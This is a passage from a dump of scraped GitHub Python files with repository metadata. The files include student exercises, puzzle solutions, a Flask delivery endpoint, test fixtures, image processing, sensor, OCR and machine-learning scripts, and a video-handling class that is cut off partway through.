+{"seq_id":"7607537115","text":"import time\n\n\nclass NotInteger(Exception):\n pass\n\n\nprint(\"First task\")\n\ntry:\n input_number = int(input(\"Enter a number or an Error will be thrown: \"))\n if type(input_number) != int:\n raise TypeError\nexcept (TypeError, ValueError):\n print(f'You entered an invalid number and an Error was thrown!')\n\n\ntime.sleep(2)\nprint(\"Second Task\")\n\ntry:\n second_task_number = int(input(\"Enter a number for the second task: \"))\n if type(second_task_number) != int:\n raise TypeError\nexcept (TypeError, ValueError):\n print(f'The number that you entered for the second task was invalid and an Error was thrown!')\nfinally:\n time.sleep(1)\n print(f'The entering phase ended.')\n\n\ntime.sleep(2)\nprint('Third task')\n\ntry:\n third_task_number = int(input(\"Enter a number for the third task: \"))\n if type(third_task_number) != int:\n raise NotInteger\nexcept (NotInteger, ValueError):\n time.sleep(1)\n print(\"The input data is not an integer!\")\n\ntime.sleep(2)\nprint(f'Fourth task')\ntime.sleep(1)\n\nclass GymPRs:\n def __init__(self, name, squat, deadlift, bench):\n self.name = name\n self.squat = squat\n self.deadlift = deadlift\n self.bench = bench\n\n def flex(self):\n print(f'{self.name} says: \"Yoo bro, my PRs are - deadlift: {self.deadlift}kg, benchpress: {self.bench}kg, squat: {self.squat}kg\"')\n\n def oneThousandPound(self):\n total_weight = self.squat + self.deadlift + self.bench\n total_weight_kg = total_weight * 0.45359237\n if total_weight_kg >= 453.592:\n print(\"Bro is in the 1000 pound club!\")\n else:\n remaining_weight_lb = round(1000 - (total_weight * 2.20462), 1)\n print(f\"Worthy for the 1000 pound club?\\nYou have to train more! You need {remaining_weight_lb}lbs more to reach the club.\")\n\n\nmy_Prs = GymPRs(\"Peter\", 110, 202, 100)\nmy_Prs.flex()\nmy_Prs.oneThousandPound()\n\nthe_data_is_valid = True\ntry:\n trainee_name = input(\"Enter your name: \")\n if type(trainee_name) != str:\n raise ValueError\nexcept ValueError:\n print(f'The name that you entered is not a string, and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_squat = int(input(\"Enter your squat PR: \"))\n if type(trainee_squat) != int:\n raise ValueError\nexcept ValueError:\n print(f'The squat PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_deadlift = int(input(\"Enter your deadlift PR: \"))\n if type(trainee_deadlift) != int:\n raise ValueError\nexcept ValueError:\n print(f'The deadlift PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\ntry:\n trainee_benchpress = int(input(\"Enter your benchpress PR: \"))\n if type(trainee_benchpress) != int:\n raise ValueError\nexcept ValueError:\n print(f'The benchpress PR that you entered is not valid and the program rose an Error!')\n the_data_is_valid = False\n\nif the_data_is_valid:\n time.sleep(1)\n trainee_Prs = GymPRs(trainee_name, trainee_squat, trainee_deadlift, trainee_benchpress)\n time.sleep(1)\n trainee_Prs.flex()\n time.sleep(1)\n trainee_Prs.oneThousandPound()\nelse:\n print(f'The class could not be called because you entered invalid data. Sorry.')\n","repo_name":"PowerCell46/Python-Programming-Basics","sub_path":"University Python Tasks/Lecture 8 Tasks.py","file_name":"Lecture 8 Tasks.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"412252395","text":"#!/usr/bin/env python3\n\nwith open('input1.txt', 'r') as f:\n lines = f.read().splitlines()\n\nclass Pack(object):\n def __init__(self):\n self.packs = list()\n self.total = 0\n\n def add(self, val):\n self.packs.append(val)\n self.total += val\n\npacks = [Pack()]\n\nfor line in lines:\n line = line.strip()\n if line == '':\n packs.append(Pack())\n continue\n val = int(line)\n packs[-1].add(val)\n\nbig = None\n\nfor pack in packs:\n if big is None or big.total < pack.total:\n big = pack\n\nprint(big.total)\n\n\n","repo_name":"mgeorg/advent_of_code2022","sub_path":"day01/day1p1.py","file_name":"day1p1.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71570508703","text":"from flask import Blueprint, jsonify, current_app\n\nfrom app.config import QueueNames\nfrom app.delivery import send_to_providers\nfrom app.models import EMAIL_TYPE\nfrom app.celery import provider_tasks\nfrom app.dao import notifications_dao\nfrom app.errors import register_errors\n\ndelivery_blueprint = Blueprint('delivery', __name__)\n\n\nregister_errors(delivery_blueprint)\n\n\n@delivery_blueprint.route('/deliver/notification/', methods=['POST'])\ndef send_notification_to_provider(notification_id):\n notification = notifications_dao.get_notification_by_id(notification_id)\n if not notification:\n return jsonify({\"result\": \"error\", \"message\": \"No result found\"}), 404\n\n if notification.notification_type == EMAIL_TYPE:\n send_response(\n send_to_providers.send_email_to_provider,\n provider_tasks.deliver_email,\n notification,\n QueueNames.SEND_EMAIL\n )\n else:\n send_response(\n send_to_providers.send_sms_to_provider,\n provider_tasks.deliver_sms,\n notification,\n QueueNames.SEND_SMS\n )\n return jsonify({}), 204\n\n\ndef send_response(send_call, task_call, notification, queue):\n try:\n send_call(notification)\n except Exception as e:\n current_app.logger.exception(\n \"Failed to send notification, retrying in celery. ID {} type {}\".format(\n notification.id,\n notification.notification_type),\n e)\n task_call.apply_async((str(notification.id)), queue=queue)\n","repo_name":"govau/notify","sub_path":"api/app/delivery/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"7"}
+{"seq_id":"17381584777","text":"def sol(arr):\r\n n=len(arr)\r\n re1=['0']*n\r\n re2=['0']*n\r\n\r\n for i in range (n):\r\n if i%2==0:\r\n re1[i]='1'\r\n re2[i]='0'\r\n else:\r\n re1[i]='0'\r\n re2[i] = '1'\r\n t1=0\r\n t2=0\r\n for i in range(n):\r\n if arr[i]!=re1[i]:\r\n t1+=1\r\n if arr[i]!=re2[i]:\r\n t2+=1\r\n print(t1,t2)\r\n return min(t1,t2)\r\n\r\n\r\nif __name__ == '__main__':\r\n st='0001010111'\r\n str=list(st)\r\n print(sol(str))\r\n","repo_name":"Samundar9525/data_structure_using_Python","sub_path":"string/binary alternating.py","file_name":"binary alternating.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"27846238863","text":"\"\"\"\nOperations to be shared across multiple tests\n\"\"\"\nimport pytest\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom two_step_zoo.datasets import Sphere, SupervisedDataset\nfrom two_step_zoo.networks import MLP\n\n\ndef pytest_configure():\n pytest.latent_dim = 2\n pytest.hidden_dims = [5, 5]\n pytest.batch_size = 5\n pytest.data_dim = 4\n pytest.data_len = 64\n pytest.image_data_shape = [3, 32, 32] # For Multiscale Flow\n pytest.noise_dim = 1 # For AVB\n pytest.activation = nn.ReLU\n pytest.optim_cfg = {\n \"optimizer\": \"sgd\",\n \"lr\": 1e-3,\n \"disc_lr\": 1e-3, # For AVB\n \"nll_lr\": 1e-3, # For AVB\n \"ge_lr\": 1e-3, # For BiGAN\n \"rec_lr\": 1e-3, # For WAE\n }\n\n\n@pytest.fixture\ndef dataloader():\n manifold_dim = 2\n\n dataset = Sphere(\"sphere\", \"train\", manifold_dim, pytest.data_dim, pytest.data_len)\n dataloader = DataLoader(dataset, pytest.batch_size)\n return dataloader\n\n\n@pytest.fixture\ndef imagelike_dataloader():\n dataset = SupervisedDataset(\n name=\"Test Image Dataset\",\n role=\"train\",\n x=torch.rand((pytest.data_len, *pytest.image_data_shape))\n )\n dataloader = DataLoader(dataset, pytest.batch_size)\n return dataloader\n\n\n@pytest.fixture\ndef batch(dataloader):\n for batch in dataloader:\n return batch\n\n\n@pytest.fixture\ndef basic_encoder():\n return MLP(\n input_dim=pytest.data_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=pytest.latent_dim,\n activation=pytest.activation\n )\n\n\n@pytest.fixture\ndef basic_decoder():\n return MLP(\n input_dim=pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=pytest.data_dim,\n activation=pytest.activation\n )\n\n\n@pytest.fixture\ndef multihead_encoder():\n return MLP(\n input_dim=pytest.data_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=2*pytest.latent_dim,\n activation=pytest.activation,\n output_split_sizes=[pytest.latent_dim, pytest.latent_dim]\n )\n\n\n@pytest.fixture\ndef multihead_decoder():\n return MLP(\n input_dim=pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=2*pytest.data_dim,\n activation=pytest.activation,\n output_split_sizes=[pytest.data_dim, pytest.data_dim]\n )\n\n\n@pytest.fixture\ndef basic_discriminator():\n return MLP(\n input_dim=pytest.data_dim+pytest.latent_dim,\n hidden_dims=pytest.hidden_dims,\n output_dim=1,\n activation=pytest.activation\n )\n","repo_name":"layer6ai-labs/two_step_zoo","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"}
+{"seq_id":"74733427742","text":"# code_#1 image segmentation\n\n'''从文件夹中读取所有图片,并从每张图片的一系列坐标开始,以100*100/33*33的大小的分割框对图像进行分割;每个点之间相距30个像素点\n,每次向右移动60/30像素,将图片分割成小图片。最终以原图片名+行名(A-H)+列名(1-12)的形式保存在一个以原图片名为名的文件夹中'''\n\nimport cv2\nimport os\nfile_pathname=\"\" #文件路径\n\ndef read_path(file_pathname):\n for root, dirs, files in os.walk(file_pathname):\n #os.walk \n for file in files: \n ##print(file_pathname+'/'+file) #test code\n if file.endswith('.png'): #selcet picture\n #Load pictures\n img = cv2.imread(file_pathname+'/'+file)\n file_name, file_extend = os.path.splitext(file) \n # Define the coordinates坐标 and size of the crop box\n\n coords = [[275,225], [275,255], [275, 285], [275,315], [275, 345], [275,375], [275, 405], \n [275,435], [275, 465], [275,495], [275, 525], [275,555], [275, 585], [275,615],[275, 645],[275,675]]\n width, height = 33, 33\n move_x = 30\n #当分割框包含1个衣藻时选择该组参数\n\n\n '''\n coords = [[275,225], [275, 285],[275, 345], [275, 405], [275, 465], [275, 525], [275, 585], [275, 645]]\n width, height = 100, 100\n move_x = 60\n #当分割框包含9个衣藻时选择该组参数\n '''\n\n\n # Loop through all the coordinates and crop the image\n for i, coord in enumerate(coords):\n x, y = coord\n for j in range(1,25): \n crop_img = img[y:y+height, x:x+width]\n cv2.imwrite(f\"D:\\\\desktop\\\\Fredrik\\\\Supplemental_Data_Set_1\\\\Image_segmentation\\\\B_TAP_photos_segmentation_in_one\\\\{file_name}_{chr(i+65)}_{j}.jpg\", crop_img)\n x += move_x\n\nread_path(file_pathname)\n\n# code_#2 color_standard_generate\nfrom PIL import Image\nimport openpyxl\n\n# 定义起始颜色和结束颜色\nstart_color = (0, 30, 0 ) # 墨绿色\nend_color = (240, 240, 50) # 黄绿色\n\n# 定义Excel文件名和工作表名\nfilename = \"\"\nsheetname = \"Color standards\"\n\n# 定义Excel中起始单元格的位置\nstart_row = 1\nstart_col = 1\n\n# 定义颜色图的尺寸和颜色数量\nwidth = 1\nheight = 300\nnum_colors = height\n\n# 生成颜色图\ngradient = Image.new('RGB', (width, height))\nfor i in range(num_colors):\n r = start_color[0] + int((i / num_colors) * (end_color[0] - start_color[0]))\n g = start_color[1] + int((i / num_colors) * (end_color[1] - start_color[1]))\n b = start_color[2] + int((i / num_colors) * (end_color[2] - start_color[2]))\n gradient.putpixel((0, i), (r, g, b))\n\n# 将颜色输出到Excel中\nwb = openpyxl.Workbook()\nws = wb.active\nfor i in range(num_colors):\n color = gradient.getpixel((0, i))\n ws.cell(row=start_row+i, column=start_col).value = f\"RGB({color[0]}, {color[1]}, {color[2]})\"\n ws.cell(row=start_row+i, column=start_col+1).fill = openpyxl.styles.PatternFill(start_color='FF'+\"\".join([hex(c)[2:].rjust(2, '0').upper() for c in color]), fill_type='solid')\n \n# 保存Excel文件\nwb.save(filename)\n","repo_name":"Fredrik-Qi/Phenotypic-Quantification-and-Clustering-Analysis-of-Chlamydomonas-reinhardtii-Mutants_code","sub_path":"Supplemental_Data_Set_1.py","file_name":"Supplemental_Data_Set_1.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"25541331245","text":"test_case = int(input())\r\nres = []\r\nnum = []\r\nfnum = ''\r\nwithdraw_amount = []\r\nfor i in range(test_case):\r\n n,bal = input().split(' ')\r\n n = int(n)\r\n bal = int(bal)\r\n withdraw_amount = list(map(int,input().split()))\r\n for k in withdraw_amount:\r\n avlbl = bal - k\r\n if avlbl < 0:\r\n num.append('0')\r\n else:\r\n num.append('1')\r\n bal -= k\r\n for l in num:\r\n fnum += l\r\n res.append(fnum)\r\n fnum = ''\r\n num.clear()\r\nfor i in res:\r\n print(i)\r\n\r\n\r\n\r\n","repo_name":"SanjayKotabagi/CODECHEF_SOLUTIONS","sub_path":"BEGINNER_LEVEL/ATM2.py","file_name":"ATM2.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"34217888584","text":"# -*- coding: utf-8 -*-\r\nimport pyxel\r\nfrom module.character import HumanGenerator\r\nfrom module.fieldStates.baseFieldState import BaseFieldState\r\nfrom module.map.cemetery import cemetery\r\nfrom module.params.monster import monsterParams\r\nfrom overrides import overrides\r\n\r\n\r\nclass StateCemetery(BaseFieldState):\r\n '''\r\n 墓地の地下のクラス\\n\r\n BaseFieldStateを継承。\r\n '''\r\n # State名\r\n stateName = \"CEMETERY\"\r\n\r\n # マップ\r\n _map = cemetery.map\r\n\r\n # 出現するモンスターリスト\r\n enemy_set = (\r\n HumanGenerator.generate(1),\r\n HumanGenerator.generate(2),\r\n monsterParams[\"WOLF_LV1\"],\r\n monsterParams[\"BAT_LV1\"],\r\n monsterParams[\"ZOMBIE_LV1\"],\r\n monsterParams[\"SKELETON_LV1\"],\r\n )\r\n\r\n def __init__(self, **kwargs):\r\n '''\r\n クラス初期化\r\n '''\r\n super().__init__(**kwargs)\r\n\r\n @overrides\r\n def onEnter(self):\r\n '''\r\n 状態開始時の処理\r\n '''\r\n super().onEnter()\r\n\r\n # 壁の色を初期化する\r\n self.set_wall_color(pyxel.COLOR_RED, pyxel.COLOR_PURPLE)\r\n\r\n @overrides\r\n def onExit(self):\r\n '''\r\n 状態終了時の処理\r\n '''\r\n super().onExit()\r\n","repo_name":"aburi6800/Python-OnyxOfBlack","sub_path":"source/module/fieldStates/stateCemetery.py","file_name":"stateCemetery.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"6084254680","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport time\nimport RPi.GPIO as io\nimport signal\nimport atexit\n\n# GPIO konfigurieren\nio.setmode(io.BCM)\n\n#Variablen deklarieren\nPIR_PIN = 4\nLED_PIN = 27\n\n# Funktionen\ndef signal_term_handler(signal, frame):\n print('got SIGTERM')\n io.cleanup()\n sys.exit(0)\n\ndef goodbye():\n print('Goodbye')\n io.cleanup()\n\ndef main():\n global turned_off\n global motion_count\n\n print('start - Warten auf erstes Event', flush=True)\n\n while True:\n if io.input(PIR_PIN):\n io.output(LED_PIN, io.HIGH)\n print(time.strftime('Bewegung erkannt %H:%M:%S '), flush=True)\n time.sleep(1)\n io.output(LED_PIN, io.LOW)\n time.sleep(.5)\n\n# --------------------------------------------------------------------\n# los gehts \n#---------------------------------------------------------------------\n\n# Abfangen von SIGTERM\nsignal.signal(signal.SIGTERM, signal_term_handler)\n\n# Abfangen von KeyboardInterrupt CRTL-C\natexit.register(goodbye)\n\n# IO setzen für LED und PIR\nio.setup(PIR_PIN, io.IN, pull_up_down=io.PUD_DOWN)\nio.setup(LED_PIN, io.OUT)\n\n# und los gehts\nmain()\n","repo_name":"spitzlbergerj/CaravanPi","sub_path":"pir/pir-testgeraet.py","file_name":"pir-testgeraet.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"7"}
+{"seq_id":"22712766748","text":"import numpy as np\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.layers.core import Dense\nfrom sklearn import datasets\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.optimizers import Adam\nfrom sklearn.model_selection import cross_validation\n\ndataset = datasets.load_iris()\n\nfeatures = dataset.data\ny= dataset.target.reshape(-1,1)\n\nencoder=OneHotEncoder()\ntarget=encoder.fit_transform(y)\n\ntrain_feature,test_feature,train_target,test_target=train_test_split(features,target,test_size=0.3)\n\nmodel= Sequential()\n\nmodel.add(Dense(10,input_dim=4, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(10,input_dim=10, activation='relu'))\nmodel.add(Dense(3, activation='sigmoid'))\n\noptimizers=Adam(lr=0.05)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=optimizers,\n metrics=['accuracy'])\n\nmodel.fit(train_feature,train_target,batch_size=20,epochs=1000, verbose=2)\n\nresult=model.evaluate(test_feature,test_target)\n\nprint(\"Resultant Error %.2f\",result[0])\nprint(\"Resultant accuracy %.2f\",result[1])\n","repo_name":"varunsly/Neural_Network_Iris-dataset_Prediction","sub_path":"Iris_keras.py","file_name":"Iris_keras.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31584609927","text":"from starlette.responses import JSONResponse\nfrom uuid import uuid4\nfrom src.extensions import create_virtual_account\nfrom src.extensions import create_contact\n\nfrom src.utils.http import session\n\nfrom src.models.request.razorpay import VirtualAccoutRequest\nfrom src.models.request.razorpayx import CreateContactRequest\n\nfrom src.database.models.users import User\nfrom src.database.models.account import Account\nfrom src.database.models.upi import UPI\n\nfrom src.database.database import async_db_session\n\n\n\nasync def create_account(request):\n json = await request.json()\n user_id = json.get(\"user_id\")\n\n if not user_id:\n return JSONResponse({\"message\": \"user_id is required\"}, status_code=400)\n\n else:\n try:\n user: User = await User.get(user_id)\n print(user)\n contact_request = CreateContactRequest(\n name=user.full_name,\n contact=json.get(\"contact\"),\n email=json.get(\"email\"),\n type=json.get(\"type\"),\n reference_id=json.get(\"reference_id\"),\n notes=[],\n )\n contact = await create_contact(session=session, data=contact_request)\n except Exception as e:\n print(str(e))\n return JSONResponse(\n {\"message\": str(e), \"error\": \"Could not create Contact\"},\n status_code=400,\n )\n\n # receivers = {\n # \"types\": [\"vpa\"],\n # \"vpa\": {\n # \"descriptor\": user.full_name.replace(\" \", \"-\"),\n # },\n # }\n try:\n # account_request = VirtualAccoutRequest(\n # receivers=receivers,\n # close_by=None,\n # notes=json.get(\"notes\"),\n # description=json.get(\"description\"),\n # customer_id=contact.id,\n # )\n # virtual_account = await create_virtual_account(\n # session=session, data=account_request\n # )\n # MOCK ACCOUNT CREATION\n upi_id = ''\n \n upi_id = await UPI.get_by_user_id(user_id)\n if upi_id:\n account = await Account.get_by_user_id(user_id)\n return JSONResponse({\n \"user_id\": user_id,\n \"account_id\": account.id,\n \"balance\": float(account.balance),\n \"upi_id\": upi_id.id,\n })\n else:\n account_id = str(uuid4())\n upi_id = f\"{user.full_name.lower().replace(' ', '-')}@okicici\"\n \n await Account.create(id=account_id, balance=0, contact_id=contact.id, user_id=user_id)\n await UPI.create(id=upi_id, user_id=user_id)\n \n except Exception as e:\n print('2')\n await async_db_session.rollback()\n return JSONResponse(\n {\"message\": str(e), \"error\": \"Could not create Account\"},\n status_code=400,\n )\n\n return JSONResponse({\n \"user_id\": user_id,\n \"account_id\": account_id,\n \"balance\": 0,\n \"upi_id\": upi_id,\n })\n","repo_name":"SudodevsHQ/betsushi","sub_path":"src/routes/create_virtual_account.py","file_name":"create_virtual_account.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
+{"seq_id":"70376907422","text":"# USSD program to withdraw,check balance,send money,buy airtime,\nuser={\n \"Name\":\"Mike\",\n \"Agent_no\":'4463',\n \"Pin\":'2342',\n \"Balance\":1000\n}\ndef menu():\n print(f\"Hello {user['Name']}, \\n Welcome to Safaricom\")\n print(\"What do you want to do?\")\n print(\"1. Withdraw Money\")\n print(\"2. Check Balance\")\n print(\"3. Send Money\")\n print(\"4. Buy Airtime\")\n \ndef Withdraw(withdraw_amount):\n transaction_fee=30\n menu()\n\n option=input(\"Select your Option: \")\n if option ==\"1\":\n # check if the balance is more than the withdraw_amount\n # if user['Balance'] <= withdraw_amount:\n # print(f\"Sorry {user['Name']} \\n Insufficient balance!!! \")\n if user['Balance'] < (withdraw_amount + transaction_fee):\n print(\"Failed \\n You must have the transaction fee to complete this request\")\n else:\n # prompt user to input agent number\n agent_no=input(\"Enter Agent number: \")\n if agent_no != user['Agent_no']:\n print(\"Wrong/ Invalid agent number\")\n else:\n pin=input(\"Enter your pin: \")\n if pin != user['Pin']:\n print(\"Wrong pin. \\n Try again later\")\n # withdraw_amount(amount)\n else:\n new_balance=user['Balance'] -(withdraw_amount + transaction_fee)\n print(f\"Withdrawal Successful You have withdrawn {withdraw_amount} from agent number {user['Agent_no']} \\n Your new balance is {new_balance} \\n Thank you being Our esteemed Customer\") \n else:\n print(\"Sorry!!1 Service On Progress\") \n \n# Withdraw(900)\n \n \n \n ","repo_name":"maxmusau/Python","sub_path":"Lesson7d.py","file_name":"Lesson7d.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"36282834745","text":"from paddleocr import PaddleOCR\nimport sys\n\nsys.path.append(\"/mnt/Software/200-Apps/imageFlow\")\nfrom config import fm_config\n\nfname = \"/mnt/Software/200-Apps/test/IN/download.jpg\"\n\n#\n# ocr = PaddleOCR(\n# det_model_dir=fm_config.DET_MODEL_DIR,\n# rec_model_dir=fm_config.REC_MODEL_DIR,\n# # rec_char_dict_path=\"\",\n# cls_model_dir=fm_config.CLS_MODEL_DIR,\n# use_angle_cls=fm_config.USE_ANCLE_CLS,\n# lang=fm_config.IMG_OCR_LANG,\n# )\n\nocr = PaddleOCR(\n det_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/det/en/en_PP-OCRv3_det_infer/\",\n rec_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/rec/en/en_PP-OCRv3_rec_infer/\",\n # rec_char_dict_path=\"\",\n cls_model_dir=\"/mnt/Software/200-Apps/filemaster_old/models/whl/cls/ch_ppocr_mobile_v2.0_cls_infer/\",\n use_angle_cls=True,\n lang=\"en\",\n)\ntext = \"\"\ntry:\n result = ocr.ocr(fname, det=True, cls=True)\n for idx in range(len(result)):\n res = result[idx]\n for line in res:\n text = text + \" \" + line[1][0]\n if len(text):\n print(text)\n\n else:\n print(\"NO text found\")\nexcept Exception as e:\n print(e)\n","repo_name":"Cap-n-Proud/imageflow","sub_path":"units/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40508004298","text":"\"\"\"Module defining the domain model entities.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport os.path\nimport re\nfrom collections.abc import Generator\nfrom dataclasses import asdict, dataclass\nfrom datetime import datetime, timedelta\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import Any\n\nimport cv2 as cv\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nVIDEO_DEFAULT_HEIGHT: int = 360\nVIDEO_DEFAULT_WIDTH: int = 640\n\n\nclass TimestampNotFoundError(Exception):\n \"\"\"Exception to raise if no timestamp are found.\"\"\"\n\n\nclass Status(str, Enum):\n \"\"\"Enum for job progress.\"\"\"\n\n PENDING = \"Pending\"\n RUNNING = \"Running\"\n PAUSED = \"Paused\"\n DONE = \"Done\"\n QUEUED = \"Queued\"\n ERROR = \"Error\"\n\n\nclass Video:\n \"\"\"Video class.\n\n This class provides various functions to retrieve data from a video file.\n\n Parameters\n ----------\n path : str\n Path to this video file as a string\n frame_count : int\n Number of frames in the video\n fps : int\n Frames per second in the video\n width : int\n Width in pixels\n height : int\n Height in pixels\n timestamp : datetime\n timestamp for when the video starts\n output_width : int\n Frame output width. Default to `VIDEO_DEFAULT_WIDTH`\n constant.\n output_height : int\n Frame output height. Default to\n `VIDEO_DEFAULT_HEIGHT` constant.\n\n Attribute\n ---------\n _path : str\n Path to the video file associated with the video.\n id : Optional[int]\n Video id from repository(database).\n frames : List[Frame]\n List of data frames containing detections associated with video.\n\n Methods\n -------\n vidcap_release()\n Release OpenCV videocapture on associated video file.\n exists()\n Checks if the path is valid, by checking if its a file on the disk.\n from_path(path: str)\n Named constructor that creates and populates a video object with\n metadata read from the file. Raises FileNotFoundError if the\n file could not be read, or is not a video file.\n timestamp_at(idx: int)\n Return timestamp at index in video as a `datetime` object.\n add_detection_frame(frame Frame)\n Add a single data-frame containing detections to this video.\n is_processed()\n Checks if the video has been fully processed by comparing with\n self.frames.\n\n Examples\n --------\n >>> video = Video.from_path(\"test.mp4\")\n >>> one_frame = video[5]\n >>> print(one_frame.shape)\n (720, 1280, 3)\n >>> many_frames = video[5,10]\n >>> print(many_frames.shape)\n (5, 720, 1280, 3)\n >>> len(video)\n 20\n >>> many_frames = video[10:]\n >>> print(many_frames.shape)\n (10, 720, 1280, 3)\n\n Raises\n ------\n FileNotFoundError\n If error reading video file when creating `from_path()`.\n TimestampNotFound\n If no timestamp where found when creating `from_path()`.\n \"\"\"\n\n def __init__(\n self,\n path: str,\n frame_count: int,\n fps: int,\n width: int,\n height: int,\n timestamp: datetime,\n output_width: int = VIDEO_DEFAULT_WIDTH,\n output_height: int = VIDEO_DEFAULT_HEIGHT,\n ) -> None:\n self.id: int | None = None\n self._path: str = path\n self.frame_count: int = frame_count\n self.fps: int = fps\n self.width: int = width\n self.height: int = height\n self.output_width: int = output_width\n self.output_height: int = output_height\n self.timestamp: datetime = timestamp\n self._current_frame = 0\n self._video_capture: cv.VideoCapture = cv.VideoCapture(self._path) # type: ignore\n self.frames: list[Frame] = []\n\n if output_height <= 0 or output_width <= 0:\n raise ValueError(\n \"Output width and height must be positive, not %s, %s\",\n output_width,\n output_height,\n )\n\n def _scale_convert(self, img: np.ndarray) -> np.ndarray:\n \"\"\"Convert and scale image using OpenCV.\n\n Converts image from BGR to RGB, and scales down to\n `self.output_{height,width}`\n\n Parameter\n ---------\n img : np.ndarray\n image to convert and scale\n\n Return:\n ------\n ndarray:\n Scaled and converted image\n \"\"\"\n new_img = cv.cvtColor(img, cv.COLOR_BGR2RGB) # type: ignore\n\n new_img = cv.resize( # type: ignore\n new_img,\n (self.output_width, self.output_height),\n interpolation=cv.INTER_AREA, # type: ignore\n )\n return new_img\n\n def vidcap_release(self) -> None:\n \"\"\"Release Video Capture.\"\"\"\n self._video_capture.release()\n\n def __iter__(self) -> Video:\n \"\"\"Class iterator.\n\n This never releases the VideoCapture. Not sure if it's kept alive, and\n if that's the case, this could cause a memory leak. To make sure this\n gets released, run `self.vidcap_release()`.\n\n See Also\n --------\n Video.vidcap_release()\n\n \"\"\"\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n self._video_capture.set(cv.CAP_PROP_POS_MSEC, 0) # type: ignore\n return self\n\n def __next__(self) -> np.ndarray:\n \"\"\"Get next item from iterator.\n\n Return:\n ------\n np.ndarray\n One frame of video as `ndarray`.\n\n \"\"\"\n err, img = self._video_capture.read()\n if not err:\n self.vidcap_release()\n raise StopIteration\n return self._scale_convert(img)\n\n def __get__(self, key: int, owner: object | None = None) -> np.ndarray:\n \"\"\"Get one frame of video.\n\n Used by `__getitem__` when only one key is given.\n\n Returns\n -------\n numpy.ndarray\n One frame of video as `ndarray`.\n\n Raise\n -----\n RuntimeError :\n if OpenCV fails to either read or set properties.\n \"\"\"\n if key < 0:\n raise IndexError\n\n if key >= self.frame_count:\n raise IndexError\n\n self._video_capture = cv.VideoCapture(self._path) # type: ignore\n retval = self._video_capture.set(cv.CAP_PROP_POS_FRAMES, key) # type: ignore\n\n if not retval:\n raise RuntimeError( # pragma: no cover\n f\"Unexpected error when setting catpure property, {retval}\",\n )\n\n retval, img = self._video_capture.read()\n\n if not retval:\n raise RuntimeError(\n f\"Unexpected error when reading frame at {key}\",\n ) # pragma: no cover\n\n self._video_capture.release()\n\n return self._scale_convert(img)\n\n def __getitem__(self, interval: slice | int) -> np.ndarray:\n \"\"\"Get a slice of video.\n\n Get a interval of frames from video, `variable[start:stop:step].\n Note `step` is not implemented and will raise a `exception`.\n\n Examples\n --------\n >>> video = Video.from_path(\"test.mp4\")\n >>> one_frame = video[5]\n >>> print(one_frame.shape)\n (720, 1280, 3)\n >>> many_frames = video[5,10]\n >>> print(many_frames.shape)\n (5, 720, 1280, 3)\n\n Returns\n -------\n numpy.ndarray\n Interval of frames returned in format\n `(frame, height, width, channels)`\n\n See Also\n --------\n __get__ : Used when only start in slice given.\n\n Raise\n -----\n RuntimeError :\n if OpenCV fails to either read or set properties.\n \"\"\"\n # If only one key is given\n if isinstance(interval, int):\n return self.__get__(interval)\n\n if not isinstance(interval, slice):\n raise TypeError(\"%s is not %s\", type(interval), type(slice))\n\n if isinstance(interval.stop, int) and interval.stop >= 